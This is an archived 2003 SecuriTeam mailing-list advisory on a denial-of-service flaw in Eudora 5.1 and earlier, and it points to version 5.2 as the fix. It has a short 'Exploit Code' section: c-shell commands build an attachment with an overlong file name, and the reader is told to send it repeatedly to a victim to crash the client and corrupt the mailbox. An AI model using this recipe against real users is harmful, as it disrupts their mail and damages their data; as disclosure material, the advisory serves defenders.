[EXPL] DoS Vulnerability in Eudora

• Previous message: support@securiteam.com: "[NEWS] Remote Sendmail Header Processing Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 5 Mar 2003 20:27:38 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  DoS Vulnerability in Eudora
------------------------------------------------------------------------

SUMMARY

 <http://www.Eudora.com> Eudora, developed and distributed by Qualcomm, is
a Mail User Agent running on Windows 95/98/2000/ME/NT 4.0 and MacOS 8.1 or
later.
A remote user can create a DoS attack by sending a file with an
exceptionally long name. This does not cause an exploitable buffer
overflow but crashes the program.
In addition, the mailbox will be corrupted and cause the program to crash
every time.

Note this is a different issue than the one discussed here:
<http://www.securiteam.com/windowsntfocus/5IP022A80I.html> Windows buffer
overflow vulnerability

DETAILS

Vulnerable versions:
 * Eudora Versions 5.1.* and lower

Immune versions:
 * Eudora Version 5.2 and higher

Exploit Code:
Create a text file with a long name using:
$ set a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
and
$ echo "security" >! $a.txt
(Written in c-shell)

Then send the file two or three times as an attachment to the victim.

Solution:
Download latest version of Eudora at:
<http://www.eudora.com/email/upgrade/index.html> Eudora Update

ADDITIONAL INFORMATION

Information was provided by <mailto:conde0@telephonica.net> David
Fernandez Madrid

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: support@securiteam.com: "[NEWS] Remote Sendmail Header Processing Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]